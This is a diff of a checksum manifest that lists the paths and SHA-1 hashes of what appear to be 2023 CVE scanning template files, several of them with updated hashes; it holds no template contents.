+http/cves/2023/CVE-2023-0600.yaml:30700aa9694a3d2a0b8e8e3a6cbb5e62bf4f572d +http/cves/2023/CVE-2023-0602.yaml:c0eea755322f7430356838e7f1d7933407e1aa99 +http/cves/2023/CVE-2023-0630.yaml:e456f1b38952459e4cb42e38a06bbd23931b5b85 +http/cves/2023/CVE-2023-0669.yaml:a971f7d133406d704b8ba7ccbf7f2c4abca80492 +http/cves/2023/CVE-2023-0777.yaml:167c7910d2f12a96430438f854a0fcba0d21d81a +http/cves/2023/CVE-2023-0900.yaml:c1dc4bf4c69f40bdf326ba1d922401a3190b3fc6 +http/cves/2023/CVE-2023-0942.yaml:a990dcfaa6a7a4ee79f1aff69a262847e86d42bb +http/cves/2023/CVE-2023-0947.yaml:7b6ddf6ec70380555a72e9719f1ee8dd2b1a4803 +http/cves/2023/CVE-2023-0948.yaml:55bae6de6c1159f8efb2f0569270bbd10ffbf114 +http/cves/2023/CVE-2023-0968.yaml:f0c3178f936096708193cac997bd3cf595a1169b +http/cves/2023/CVE-2023-1020.yaml:2cf076a88909c9008d94039b9aff3cf002b56574 +http/cves/2023/CVE-2023-1080.yaml:78fe56ccbc0385de19e094d5dd8790d97c7549b8 +http/cves/2023/CVE-2023-1177.yaml:b2459a295b180bbce0c5f78383c583842fd7834e +http/cves/2023/CVE-2023-1263.yaml:804ada973ecb136afa67ae4119851f679b5d5150 +http/cves/2023/CVE-2023-1362.yaml:a3bcd930f652a44312aae5afa1bb61b0ade1c071 +http/cves/2023/CVE-2023-1408.yaml:447722f74d5b6c9f91c157020b7518465eaf664f http/cves/2023/CVE-2023-1434.yaml:bf8d64d6d82ffcf748231e95e97d15c46e96e9a9 -http/cves/2023/CVE-2023-1454.yaml:3a62fb73ff44ea325a51340b36872cf30c7a263c -http/cves/2023/CVE-2023-1496.yaml:c9e79d624d6ab389e611dec0f0a21cc4650a57da -http/cves/2023/CVE-2023-1546.yaml:46e0a6e9064f963d55ee2c068b723dac1a0537b8 -http/cves/2023/CVE-2023-1671.yaml:0f6aff0a210209f04f023ef7e8cbe262b2ffece7 -http/cves/2023/CVE-2023-1698.yaml:4e665491db1f6274a9ea9fb874df31431d0b7fa5 -http/cves/2023/CVE-2023-1719.yaml:5e02329c731cb356e938f264802f2819cc7e3535 -http/cves/2023/CVE-2023-1730.yaml:332c5b9f3d584465f1b4fb08ea05c301aa8dc444 -http/cves/2023/CVE-2023-1780.yaml:6db4ef30af440b18711833f48ac1b2a83d7ffd8d -http/cves/2023/CVE-2023-1835.yaml:e331923dda5d28d66c102f3a4dfb37c821ac7d05 -http/cves/2023/CVE-2023-1880.yaml:9fdf3c4bb9c44f3e436182f313c9b2906048679e -http/cves/2023/CVE-2023-1890.yaml:3cec9e46832b0b8b500fd9cfebcc9a98e6d217a3 -http/cves/2023/CVE-2023-20073.yaml:208733a21b8455eb40b82d69316cc794b9cfe19e -http/cves/2023/CVE-2023-2009.yaml:9880e6bec74dfa60e3f091f2bdd1cc0f3ce2fa0b -http/cves/2023/CVE-2023-20198.yaml:d20cf7a3f4f392e04cd00108420a378713ce9c0d -http/cves/2023/CVE-2023-2023.yaml:e8e287e7e9cf0763ff4371d36fed641504252706 -http/cves/2023/CVE-2023-20864.yaml:a53c7516f55f77bc05c9b84d1b33098f01010062 -http/cves/2023/CVE-2023-20887.yaml:f6cbd7eca953c3c5baaecb052c4283682415c114 -http/cves/2023/CVE-2023-20888.yaml:1ef06e3bc39faec56b171927815a4cbf76bc43f6 -http/cves/2023/CVE-2023-20889.yaml:e946620fc95e17e67436fd77ec9ccab03c7ce129 -http/cves/2023/CVE-2023-2122.yaml:28e79da74b302b92c28a44a9829da78a038d13d0 -http/cves/2023/CVE-2023-2130.yaml:4cb266cd4407aeccfd9cc3f8c91975170387a260 -http/cves/2023/CVE-2023-2178.yaml:4534c5a378800af9830b015c7d8872d3dc552c69 -http/cves/2023/CVE-2023-22232.yaml:868e6ef85f76eddd840b147d6c41e68c1c97ebe4 -http/cves/2023/CVE-2023-2224.yaml:18577c2a82c3f8e1ed7bde86230e8ffc1609868f -http/cves/2023/CVE-2023-22432.yaml:d7eb0d361c52d05e87b68ef932051b9bc8a712df -http/cves/2023/CVE-2023-22463.yaml:e6e9c7408bcaea9971e855e15aebb86ba70a3ea6 -http/cves/2023/CVE-2023-22478.yaml:8a65cd6a0c04b97e3b9a0f2382586a04135b0465 -http/cves/2023/CVE-2023-22480.yaml:0046ec24cc773e4956dea864a26648c98a6807b7 -http/cves/2023/CVE-2023-22515.yaml:bef2df26e91eaaf24b6fba2c32dad59fad8c7e68 -http/cves/2023/CVE-2023-22518.yaml:eb7c2cdd3f9c934fcea53ee887c3881c070382a4 +http/cves/2023/CVE-2023-1454.yaml:b80cfd9e69ebf4dd76099d444bb452f877fd989f +http/cves/2023/CVE-2023-1496.yaml:6bcdcd305b7f85ca2cdaed2d08d53e1dfa894994 +http/cves/2023/CVE-2023-1546.yaml:0e8e84df2bd3e3d592d6c1bcb26eb87cd27c084c +http/cves/2023/CVE-2023-1671.yaml:52c064a1c7dbb620df0b41e9e08a4fd594b36821 +http/cves/2023/CVE-2023-1698.yaml:e8791c6acc99d7d80bbe23b2b6ef49f0544d18e0 +http/cves/2023/CVE-2023-1719.yaml:dae4696a83f7190c7865c27fa7c3c4e85830ccb6 +http/cves/2023/CVE-2023-1730.yaml:49401e1489608b166904c95ed5f53b4d261e73fa +http/cves/2023/CVE-2023-1780.yaml:3dbd8f62ccaf36c46c38b2b9dcbdb870d724028e +http/cves/2023/CVE-2023-1835.yaml:de5e5300b6b03de9125859d0527d297c13b0e7db +http/cves/2023/CVE-2023-1880.yaml:a4425dd9230f3c05934e1e754fad180877930394 +http/cves/2023/CVE-2023-1890.yaml:0bafa17b780a0ce5bd1599d70151ea21d157c408 +http/cves/2023/CVE-2023-20073.yaml:6fd40fb9988def910bd4e8bec5ffd1cd238b3fd5 +http/cves/2023/CVE-2023-2009.yaml:7fe8bdaea125aed479fe1bb8df5ef4a6a92e66e0 +http/cves/2023/CVE-2023-20198.yaml:e50ee1cdc0d4a113446671adac499009835838ca +http/cves/2023/CVE-2023-2023.yaml:0d70e539481d69016abb49ca77fb963fcd53b3fd +http/cves/2023/CVE-2023-20864.yaml:befaa57f62f7f5ce9ee23ae7572fd4fb204e3ec2 +http/cves/2023/CVE-2023-20887.yaml:05509b2abd9f137eeb08a1f77e89a5f9431e65f8 +http/cves/2023/CVE-2023-20888.yaml:d0f007f0cb1b365161390d3452c8c208a823b92f +http/cves/2023/CVE-2023-20889.yaml:e3dcf1b5061f109dc9c81c3a0dd4e7390d5ddd2f +http/cves/2023/CVE-2023-2122.yaml:f276f27ae52fd3bf7ab4c9b2cb2b1d98c2fa4b31 +http/cves/2023/CVE-2023-2130.yaml:5debf9f2549dc6250e3ecdd548fb6e013416685e +http/cves/2023/CVE-2023-2178.yaml:32b665d2370dc7c23214d7af5880ae4e28f2ce95 +http/cves/2023/CVE-2023-22232.yaml:eb6954a69e5c3447eb47b5733836c85a59fe6e54 +http/cves/2023/CVE-2023-2224.yaml:f352f11fd81a9a7923a0a47ab6f95eaa01271d49 +http/cves/2023/CVE-2023-22432.yaml:05dc4e0844cd14e5586e38f00a5a466e6f96eff3 +http/cves/2023/CVE-2023-22463.yaml:5fb179b3a7317fabf2c776ebe72467d5df0f7175 +http/cves/2023/CVE-2023-22478.yaml:567f4c76f551ab3ea9b505b09830d3d470e2f8c9 +http/cves/2023/CVE-2023-22480.yaml:fcbed31b686b8d1aa6c59823131eb4e19fdb5a58 +http/cves/2023/CVE-2023-22515.yaml:b255dfb1021096979d30646eeb61741da2728dc5 +http/cves/2023/CVE-2023-22518.yaml:b4424faf470cc7f3420924974cbc5b447087fe3c http/cves/2023/CVE-2023-2252.yaml:1e734fe3dd356b49ef60cf34c3a8183b93fed27d -http/cves/2023/CVE-2023-22620.yaml:82ffd92a966e3848ba12d934c03f5730db0ce1be -http/cves/2023/CVE-2023-2272.yaml:2fdb2481d3c41291f6fd56d7e570639389687fa2 -http/cves/2023/CVE-2023-22897.yaml:5bf9dfc755f4769c2b8b1c3d23c54ff5eaeb440b -http/cves/2023/CVE-2023-23161.yaml:d76c15bddf4cfe73ce573ec0cee28891696b5d02 -http/cves/2023/CVE-2023-23333.yaml:20c725b69dd1fd46f011491ba6b5bd52a053edce -http/cves/2023/CVE-2023-23488.yaml:ff74731bb23b6b8a07e1ae8303787b8891b900b0 -http/cves/2023/CVE-2023-23489.yaml:6e9ea75867a3bc878418001eba31a8ccbad0685f -http/cves/2023/CVE-2023-23491.yaml:da305e43e0da64da021772e3d1eb6cf553e9b776 -http/cves/2023/CVE-2023-23492.yaml:2b005bb531a0ce702a2ea7e37eebb5392ba5bc50 -http/cves/2023/CVE-2023-2356.yaml:acad700f82d7b2bbc82ba10cadad2e760d81f2f1 -http/cves/2023/CVE-2023-23752.yaml:a52c6418d576eb3be1c4ed35f16b3410e39e69e9 -http/cves/2023/CVE-2023-24044.yaml:baa8b795958022299e0bcf94bf3ce9b0812b5db6 -http/cves/2023/CVE-2023-24243.yaml:6eb36314360b26156fba67825b7354de11328b2e -http/cves/2023/CVE-2023-24278.yaml:71d7b526855057e676ebd88abb9c78f61f7eefdf -http/cves/2023/CVE-2023-24322.yaml:76991107038aaae6da13b23a9b61ee981368fd2b +http/cves/2023/CVE-2023-22620.yaml:8e4830cfd074437f59e86eeee6f7938ea8a8317b +http/cves/2023/CVE-2023-2272.yaml:c6835cb1ab462d87c34c4926976d2cb1f4baf9f1 +http/cves/2023/CVE-2023-22897.yaml:bd8d117eb0c826714edde3c3c6281de185c1ad66 +http/cves/2023/CVE-2023-23161.yaml:fd50247f7381d4701b06634cc50d59cb520778e8 +http/cves/2023/CVE-2023-23333.yaml:022f4c512994d8a6ff23c8e87e47bdf24bbced96 +http/cves/2023/CVE-2023-23488.yaml:2e9cdee017892eeba0359fbcb6c6ea8e65ed96e4 +http/cves/2023/CVE-2023-23489.yaml:10bfcdf1bd90562a03236e8dbeafec3111d53b65 +http/cves/2023/CVE-2023-23491.yaml:11c4b69a9588660d55cecbcf0d3e386eca009a68 +http/cves/2023/CVE-2023-23492.yaml:e013e56e4453f44f661865b88bd882bd81c30e86 +http/cves/2023/CVE-2023-2356.yaml:1c89605a11dc27d46373dc9df46eaaf01064513c +http/cves/2023/CVE-2023-23752.yaml:3e31930536cc6b012a7923a156b01965fbb90469 +http/cves/2023/CVE-2023-24044.yaml:ebd2e39af6b7428999d27f5b9f563801d261c133 +http/cves/2023/CVE-2023-24243.yaml:65c35031bf307d6cc116b402d67be55fa655ab00 +http/cves/2023/CVE-2023-24278.yaml:7af68cea7556936e0a874745322bee3183fbf203 +http/cves/2023/CVE-2023-24322.yaml:f4455263195b904f944f62f453d2b4b531af4e77 http/cves/2023/CVE-2023-24367.yaml:5f7e02e71fb9a5dd6c0bfd91e58517a935e53b52 -http/cves/2023/CVE-2023-24488.yaml:6f223108290e7e2149a9c95f2c3d0c190f758a88 -http/cves/2023/CVE-2023-24489.yaml:24f5e03e04f2de445651b5ff915f7ae09afeda27 -http/cves/2023/CVE-2023-24657.yaml:fc95bb552b7b381eb6c2f08d8a1a94779e748cc5 -http/cves/2023/CVE-2023-24733.yaml:a94e071a965e96bd57f06d42cacd12d678f5d1b2 -http/cves/2023/CVE-2023-24735.yaml:a6f1f8fd2d7682e7efd16518cd91a1460a6d1fa8 -http/cves/2023/CVE-2023-24737.yaml:101dafbdbfc1a3e9cb1a004f8c4643112fd8374c -http/cves/2023/CVE-2023-2479.yaml:0022a53d232bc8cab8a913e8cdc8a1cbf465a41b -http/cves/2023/CVE-2023-25135.yaml:7802352d8baf963eeb7ab65f25f93b6991676709 -http/cves/2023/CVE-2023-25157.yaml:130aa89caae0650a02abb58f1a08d9f514e32a93 -http/cves/2023/CVE-2023-25346.yaml:6e7dcc2d3eea0c4bb95c9ed16b9fe1dde637bb84 -http/cves/2023/CVE-2023-25573.yaml:8ce942afa107836725174a8903841cda8de17686 -http/cves/2023/CVE-2023-25717.yaml:1eb8d2568af2b4f39d6447a86294d6e9ea085ec5 -http/cves/2023/CVE-2023-26035.yaml:63200270efc4fbd34f218adaaf7ee22cb56beca5 -http/cves/2023/CVE-2023-26067.yaml:c28cf9ca5b9a40a66599773188392643a81e132d -http/cves/2023/CVE-2023-26255.yaml:238f138be24182785b3e228901ac1c3a010184fb -http/cves/2023/CVE-2023-26256.yaml:5bb63fa3aa76ff3ad965c527d591bd863c91d828 -http/cves/2023/CVE-2023-26347.yaml:c0db11c1ff59f611886e5e990610edd8fe5bbf41 -http/cves/2023/CVE-2023-26360.yaml:4ea546e5f2d4e72d58e49dceda0c20fed1f7f3b1 -http/cves/2023/CVE-2023-26469.yaml:09b69416037e9cbda9ae1229d619b25e085ecbe1 -http/cves/2023/CVE-2023-2648.yaml:0e6bbb3b726943c839abd4cfc369c2489bca1e4a -http/cves/2023/CVE-2023-26842.yaml:fb733697c17ff028af94fab9d9df5fb77867d7f4 -http/cves/2023/CVE-2023-26843.yaml:73002eb7aa30d6db25795334f9a1c0a9259b4265 -http/cves/2023/CVE-2023-27008.yaml:f01008eda042a76dcac80bb5a3510b2e14a7a8af -http/cves/2023/CVE-2023-27034.yaml:78c10b5f70a15177e7134627e402681a53097800 -http/cves/2023/CVE-2023-27159.yaml:4dd4a042ffa93cc2a73443027c668674bbcdd365 -http/cves/2023/CVE-2023-27179.yaml:6844f813b51f19e8013066fefb6f860299e65680 -http/cves/2023/CVE-2023-27292.yaml:0a1357c597c7a943571dfffbe23ad5fc64d3a682 -http/cves/2023/CVE-2023-2732.yaml:e29e3a3c63f71563d789104653a45259b3898b6d -http/cves/2023/CVE-2023-27350.yaml:64426d7e7a5be3a3379c6b76b8e9d45322dfb36f -http/cves/2023/CVE-2023-27372.yaml:50ba43c671a3116eca0a01fa1d29d33b64ef8fbd -http/cves/2023/CVE-2023-27482.yaml:75eae5daa3e7334b4e25bb8fb924288e059b723b -http/cves/2023/CVE-2023-27524.yaml:bdd0212a75e482ee6ab890d2da403185a3238a95 -http/cves/2023/CVE-2023-27587.yaml:c9da7fc46721e219228464bb117057b819528c8c -http/cves/2023/CVE-2023-2766.yaml:9e6118225d7ef6694961a0846bc52054e51f52c8 -http/cves/2023/CVE-2023-2779.yaml:f1199d114e15f43d3284184f2b8941b626512db1 -http/cves/2023/CVE-2023-2780.yaml:10dc486669c7ebdd9cbb8e719b3cd1d95e6c58bb -http/cves/2023/CVE-2023-27922.yaml:95b99755b83ab0d8955d1b5d5575632153e93ab5 -http/cves/2023/CVE-2023-2796.yaml:f6ab7a32670924165a669f4c07eabea8410a9555 -http/cves/2023/CVE-2023-28121.yaml:c0b9bbb4f6db6510c1a2af9eef2b7e5b90b4161b -http/cves/2023/CVE-2023-2813.yaml:45285b1ddc0a876b112cbf0346813038536659dc -http/cves/2023/CVE-2023-2822.yaml:504b7a0600567b3faed9fb912f21034dd82c3685 -http/cves/2023/CVE-2023-2825.yaml:c3131064b7add3a0d28c6ee38f1b8f2ec2875e78 -http/cves/2023/CVE-2023-28343.yaml:278df3b4baa43219e64e5ab5d8f31dfc9198a331 -http/cves/2023/CVE-2023-28432.yaml:5b4cf8a825f84864d512de3aa4b2fc7fd1818c55 -http/cves/2023/CVE-2023-28665.yaml:889d17ba2056e8c0ae94a7f42c4ae20ed1257a99 -http/cves/2023/CVE-2023-29084.yaml:0a67baf585f8271a21cfff0f87df20d871f77674 -http/cves/2023/CVE-2023-29298.yaml:1dc1782ac1c5bf5c61fe3c8a0b984bda6be6bda5 -http/cves/2023/CVE-2023-29300.yaml:f1083c48ec36092004f295ba26e1b663ed54534d -http/cves/2023/CVE-2023-29357.yaml:2e02dbcb85049876950cf3ab071df7b7dcc7a723 -http/cves/2023/CVE-2023-29439.yaml:ae906ea162cbdf4dda0115025190b2cf861a6c0b -http/cves/2023/CVE-2023-29489.yaml:88f597dd6615383ce822dff0efa4043ac33d32f9 -http/cves/2023/CVE-2023-29622.yaml:99ef4c0dafa724f7efe898f0594e27dd8b477685 -http/cves/2023/CVE-2023-29623.yaml:cd55520571e0322e483f867c60fe723bcdd8e355 -http/cves/2023/CVE-2023-2982.yaml:bc204c218514dd7ecd8ee67c5c84c6d1af3f42eb -http/cves/2023/CVE-2023-29887.yaml:957c1d11965ba2e2c3fc325c4371f411a62f92ac -http/cves/2023/CVE-2023-29919.yaml:da7f2fb309e9a37ee1bf99a8455e5bd75e42999f -http/cves/2023/CVE-2023-29922.yaml:bae3aff5e61d5f32d9a8d269de00c516774b9bd4 -http/cves/2023/CVE-2023-29923.yaml:2d17123907028315c11dbf4a946a82296240b9ea -http/cves/2023/CVE-2023-30013.yaml:e019aa8553470d42657e15d76d26e956b8e96924 -http/cves/2023/CVE-2023-30019.yaml:7c871c3f7983a610b29faa78bfd4b8d6d01ac87c -http/cves/2023/CVE-2023-30150.yaml:35b498670bdc83f37891c25a05f4319a20ef0ff9 -http/cves/2023/CVE-2023-30210.yaml:5a7e1683d4425d79d566e86638df24f0cce45b28 -http/cves/2023/CVE-2023-30212.yaml:1870a39acc9c44afeb4fbf086e862668f9672693 -http/cves/2023/CVE-2023-30256.yaml:2ab64264901b5719dfb6d754ee04918d22f6e6f0 -http/cves/2023/CVE-2023-30258.yaml:06d2d3466030c96310a9c8e0c38047662a2e3a03 -http/cves/2023/CVE-2023-30534.yaml:bf877614d1536ae66dd3600914bbc7a26a79e065 -http/cves/2023/CVE-2023-30625.yaml:f36b268982548a9a12e06168757c9669f101fc69 -http/cves/2023/CVE-2023-30777.yaml:475f3d16401556d5e87c739799d909f8fb54c54c -http/cves/2023/CVE-2023-30868.yaml:bee37d17f414e42da21d9c283ef3946cd5aad986 -http/cves/2023/CVE-2023-30943.yaml:8569372600521f64500bb8fbd5766ab14c3c5b58 -http/cves/2023/CVE-2023-31059.yaml:f65605a966c718e8f5df044d80dc8710bd17243f -http/cves/2023/CVE-2023-31465.yaml:b585cec62e99e8bd0e0109c04f6937d5929f1288 -http/cves/2023/CVE-2023-31548.yaml:5ffe6126f7ae401a1543e1f4434754b58fba981e +http/cves/2023/CVE-2023-24488.yaml:1c4f8b0a05fa0dc89fd2698a6f2989a861f41282 +http/cves/2023/CVE-2023-24489.yaml:be014be46e703aa22e7b4a0afa8a710057b9a728 +http/cves/2023/CVE-2023-24657.yaml:de95de89e1a7c1a0c655b5740f32ccc4f42121f0 +http/cves/2023/CVE-2023-24733.yaml:bb456a03873743a81c2ab69e0a6a12601da090dd +http/cves/2023/CVE-2023-24735.yaml:162751e11e9488665892a6e6934a5020a0db13ad +http/cves/2023/CVE-2023-24737.yaml:b886fb55bf69efc4c64d1191806105df568712b9 +http/cves/2023/CVE-2023-2479.yaml:849fd65860aed7bbca5c89abad5de418fddc98e0 +http/cves/2023/CVE-2023-25135.yaml:61783a39d20c31283cbf2478e85d4325afe3eeec +http/cves/2023/CVE-2023-25157.yaml:e416a9d960f58b87bd700fa02c376f42bc0e5cf2 +http/cves/2023/CVE-2023-25346.yaml:5084f3370120eba70b5f819d8572446e06a1ab0b +http/cves/2023/CVE-2023-25573.yaml:69c28aca9ad4115acfab77c218a766b30f721119 +http/cves/2023/CVE-2023-25717.yaml:b77c8997770cccf3736c1ddac3d4f328c710633f +http/cves/2023/CVE-2023-26035.yaml:a99c910c0d92dcda59d2d49955304b2c88696f73 +http/cves/2023/CVE-2023-26067.yaml:6d15ee75205337f64be165080afdaca097bed281 +http/cves/2023/CVE-2023-26255.yaml:067eeb30b01e1df9e598a7eb1c3cee4c566cddce +http/cves/2023/CVE-2023-26256.yaml:5ea92ccd314fe9103bc4b2a06a0f2e483828dfca +http/cves/2023/CVE-2023-26347.yaml:297fb63efa4d0eceb60835dbabdc6e888f6c351d +http/cves/2023/CVE-2023-26360.yaml:f1d2f774bda22ed5b6cf03dd6b7ce289ec0b119b +http/cves/2023/CVE-2023-26469.yaml:b99b3e0b8dea25e8b6ea692fbabb81b4dfc557f5 +http/cves/2023/CVE-2023-2648.yaml:d6e3a71b2a849425be4aae9b7574f862975c6336 +http/cves/2023/CVE-2023-26842.yaml:be25c13bd2e5b8dbdee96d8bc0b97ef86077351d +http/cves/2023/CVE-2023-26843.yaml:024bcca905f5889c54df218a7d1784d893d0d77d +http/cves/2023/CVE-2023-27008.yaml:7707d7966e5497274ff98a3cd86ea1f130e234aa +http/cves/2023/CVE-2023-27034.yaml:5abb358be1502611cdc27d4d4f9a0898b3184c32 +http/cves/2023/CVE-2023-27159.yaml:952fdeed8ecae5187e9c6cf193960f47490ef0b8 +http/cves/2023/CVE-2023-27179.yaml:98e60c3dd221813b1377a5fe19bfaa5e8ccaaf67 +http/cves/2023/CVE-2023-27292.yaml:271860a64035abc6b482c932b38965ecd7249a04 +http/cves/2023/CVE-2023-2732.yaml:51d9d4d186c71550a7df2f67717e26dd14f62929 +http/cves/2023/CVE-2023-27350.yaml:a9856ebc33343c6ad1fe34954d34577c935b73bc +http/cves/2023/CVE-2023-27372.yaml:d744319c484b31a77199027880f3b495661efe1f +http/cves/2023/CVE-2023-27482.yaml:d3e54d87d59c329934552c343f0825c907718e35 +http/cves/2023/CVE-2023-27524.yaml:205d8375ff6561134eeacb79e4bd6b75a5364969 +http/cves/2023/CVE-2023-27587.yaml:db9bd57349b78b0aee02c74c12f258c12366bbdc +http/cves/2023/CVE-2023-2766.yaml:ed017d7f1bfa6e3d94dfa8128e4e7f679ad0653a +http/cves/2023/CVE-2023-2779.yaml:bc6b98bf6b093b9c0ba54f6b48dacd080f10fc7c +http/cves/2023/CVE-2023-2780.yaml:fa5901b24b4b319a58d2dd183038d589eba4ce02 +http/cves/2023/CVE-2023-27922.yaml:10cf6f1c1632a2808092d5b3e6033cc93ab2f5d8 +http/cves/2023/CVE-2023-2796.yaml:bd9fb52770d83d0add03be146939a9f54d03101e +http/cves/2023/CVE-2023-28121.yaml:7bfa68f936d647b8c28108b2de2e26fc76a44771 +http/cves/2023/CVE-2023-2813.yaml:41bbaf844fa4a1d607320a28990d46e62c5ac021 +http/cves/2023/CVE-2023-2822.yaml:e3c533116077d3c60028bd69583d5bd765db68b7 +http/cves/2023/CVE-2023-2825.yaml:c27bff58c63fa2b83ce8b649c4ac7348ed4b1b8e +http/cves/2023/CVE-2023-28343.yaml:388638fb208e66148600a939f2e133ffd016ec11 +http/cves/2023/CVE-2023-28432.yaml:b117f27065e0313b6328ce3b69eb6b269e900a9b +http/cves/2023/CVE-2023-28665.yaml:efcbeb9b3850c65bd780a5e0a9d3c93e36c85bcf +http/cves/2023/CVE-2023-29084.yaml:154a794701929eceb0759479846fa2938f660b92 +http/cves/2023/CVE-2023-29298.yaml:1a49d506b11b16108045710d3dcbfc7ea5c39c28 +http/cves/2023/CVE-2023-29300.yaml:80de5e3e1aefeb4d3362e9bc915c982a32100c18 +http/cves/2023/CVE-2023-29357.yaml:b2dace5bce7be6bb810a0b1b66caed6c72d20e4b +http/cves/2023/CVE-2023-29439.yaml:3da5e2222b7357cd82bda08877d503c8165f82c5 +http/cves/2023/CVE-2023-29489.yaml:2ed80e23b0b9090292376856110ed2ed4b61fb73 +http/cves/2023/CVE-2023-29622.yaml:ede8cf727d6fafd2a60f6f53ab90d9ef06e7a334 +http/cves/2023/CVE-2023-29623.yaml:61c893bbc537f7fa051a4dd80050f2df767bf89d +http/cves/2023/CVE-2023-2982.yaml:5456b35674007f95b2631b3549a92cedb226599e +http/cves/2023/CVE-2023-29887.yaml:d9c1b67c42637ad1b50c750e6b726b90068cccd3 +http/cves/2023/CVE-2023-29919.yaml:db44dedd5fa74ca49970c2ae3c186f76362927a6 +http/cves/2023/CVE-2023-29922.yaml:5e7836d73a7363c838a5bad713a65d543b596b5c +http/cves/2023/CVE-2023-29923.yaml:b6bf0ffcca8295ea5983d79f9faa980200d98f01 +http/cves/2023/CVE-2023-30013.yaml:b0b0d4a3c512aa194531fe67a9b534002b4b29c9 +http/cves/2023/CVE-2023-30019.yaml:70506ecdb5415e1b450dc5bf18afab77f9892846 +http/cves/2023/CVE-2023-30150.yaml:10c135131436530592f20848d4dec283a4d1dbdc +http/cves/2023/CVE-2023-30210.yaml:8d2cb9646b71cfee65d96f8f55613e54d492e7b4 +http/cves/2023/CVE-2023-30212.yaml:346d83ac9ad31b50f994c227531a6a30abf1bf91 +http/cves/2023/CVE-2023-30256.yaml:bcfa184e9365a8bcae8366f4bf1c2b50d4c87f2f +http/cves/2023/CVE-2023-30258.yaml:c92abc8148da391cb03822749bcef8fd69cfd45f +http/cves/2023/CVE-2023-30534.yaml:2a1d0936464c10f67ae68f47943af1fe17dc0bd4 +http/cves/2023/CVE-2023-30625.yaml:d7f9df1364d03c41cb0fea4c8e194c511b20450a +http/cves/2023/CVE-2023-30777.yaml:07689d90d7497c42b9b7f94860968e64f140e6a5 +http/cves/2023/CVE-2023-30868.yaml:1ae46dcd8ebec06ed399fc54e5b1c4fd7fe9ec0e +http/cves/2023/CVE-2023-30943.yaml:77e90fe9abe45d75237120867ab83330c12b389c +http/cves/2023/CVE-2023-31059.yaml:593d8fa57e146f5e9be970f8dacf854cfa56c818 +http/cves/2023/CVE-2023-31465.yaml:97de5fe8a0058da40bf57e846c677819f3cc0732 +http/cves/2023/CVE-2023-31548.yaml:7f1c1854cc5de4cb56b7aa70c28566ad6309f0c8 http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b -http/cves/2023/CVE-2023-3219.yaml:3cffb16cb5b6b4ce8bb78b0b43b9ff41cabe82cf -http/cves/2023/CVE-2023-32235.yaml:c8f645afb97f0c062eea4e1728e864038fb2a212 -http/cves/2023/CVE-2023-32243.yaml:787dac0f0325e74790f4e6e44a32169320f98f00 -http/cves/2023/CVE-2023-32315.yaml:97f465fa1145215c90ee4cb590bf8c6fdedbd2df -http/cves/2023/CVE-2023-32563.yaml:26a5c917b2784c849f5f34a39ee5de9faf4e8b07 -http/cves/2023/CVE-2023-33338.yaml:ddc0a89ddbc3b4dc45924c391b17a08fac2cbe6a -http/cves/2023/CVE-2023-33405.yaml:cdfcc1cb7eb21be47af0e53a91ec403fd303a521 -http/cves/2023/CVE-2023-33439.yaml:860da0c6ca5288231075ab9e9cc8e1336a0aea38 -http/cves/2023/CVE-2023-33440.yaml:e23de92411d853ecc75e61c7ec6c738404ed4ce0 -http/cves/2023/CVE-2023-3345.yaml:32d94243152c1749ba4bc7718157c9cb216afd2d -http/cves/2023/CVE-2023-33510.yaml:ff17088baa1f8d63af36c5df60d909022109577e -http/cves/2023/CVE-2023-33568.yaml:e43289ef96353856ad293fc90839d1bbec6911f2 -http/cves/2023/CVE-2023-33584.yaml:82eb18909f4abb14907d0ef050b8d270e6d43e70 -http/cves/2023/CVE-2023-33629.yaml:313b5659701bb81707ae103623bb41f713c6918e -http/cves/2023/CVE-2023-3368.yaml:47ae31c627cafa57d17c30cd1ce428c2012b8034 -http/cves/2023/CVE-2023-33831.yaml:fbbac2c5e72e1e8775b0654b232f49fa93d9fbfa +http/cves/2023/CVE-2023-3219.yaml:a07d20f0e4da5b53472448a134188f4cffbb023e +http/cves/2023/CVE-2023-32235.yaml:afd628e1b8a7461155746eb438b59da8fe7d4f27 +http/cves/2023/CVE-2023-32243.yaml:17479bd2a5ecfa6895531239bc09e4d5038e9d89 +http/cves/2023/CVE-2023-32315.yaml:452e45b149b30a4b58a839b7f9ef4bb2a7f48c4d +http/cves/2023/CVE-2023-32563.yaml:32d85b2838b45973090bb775d5c4e79fda047970 +http/cves/2023/CVE-2023-33338.yaml:9a3f4a356da77bcef004eba7c77121280e270d58 +http/cves/2023/CVE-2023-33405.yaml:8992663a6084f476918777277c6e747f58480a37 +http/cves/2023/CVE-2023-33439.yaml:0a6972ddb8bbcd2af2029628bce24f17ee581b25 +http/cves/2023/CVE-2023-33440.yaml:cd61a9585537b36a822f24f62c663abc243bd61a +http/cves/2023/CVE-2023-3345.yaml:587cd2843ceebf740c74245d4c59fdd5918e9b11 +http/cves/2023/CVE-2023-33510.yaml:8a36c1e449e2a023a0ef6c1746366ca05fcdb3d6 +http/cves/2023/CVE-2023-33568.yaml:2603660536608579db90a6a490f281e02594f74a +http/cves/2023/CVE-2023-33584.yaml:a60d2f537f5e2c47bf4d0b975ed21f370ad4d7c3 +http/cves/2023/CVE-2023-33629.yaml:18fe6ba54814a484a3fc32caf50a515e3b48f258 +http/cves/2023/CVE-2023-3368.yaml:d3d5b104af8e2fff580902e694564ba6d32535dc +http/cves/2023/CVE-2023-33831.yaml:fe5e9532b9ef6d234c1800844743506a04c10cc4 http/cves/2023/CVE-2023-34020.yaml:2c2061da5887f502224eccbd3a9a2067db134d8e -http/cves/2023/CVE-2023-34124.yaml:957cfc1e38e2a5b18200a503f002427e08c39b66 -http/cves/2023/CVE-2023-34192.yaml:a1280ce2d10f9e059d8a8023db4d2e5dcadc61bc -http/cves/2023/CVE-2023-34259.yaml:654055c0bbb9d901f6b23e85781fb1c4d0137562 -http/cves/2023/CVE-2023-34362.yaml:a3818b460b39f7329802e10327826479ed7af8e9 -http/cves/2023/CVE-2023-34537.yaml:e66c351d9f18765d7b6395a91c0eb6b1b30ee61c -http/cves/2023/CVE-2023-34598.yaml:7e3c0a69b45ce368424d8f7182c35f98ebaf5e2b -http/cves/2023/CVE-2023-34599.yaml:6efe2d293144c647974277c8d509b1917c25929a -http/cves/2023/CVE-2023-3460.yaml:7cfca590faadb6977cfd41ef6fee21ad886723c2 -http/cves/2023/CVE-2023-34659.yaml:d481522919a12ff8d2f28cbcfbed36e7852f8821 -http/cves/2023/CVE-2023-34751.yaml:f57e7db1f24b236cf01d91816332dc67e1efe0ea 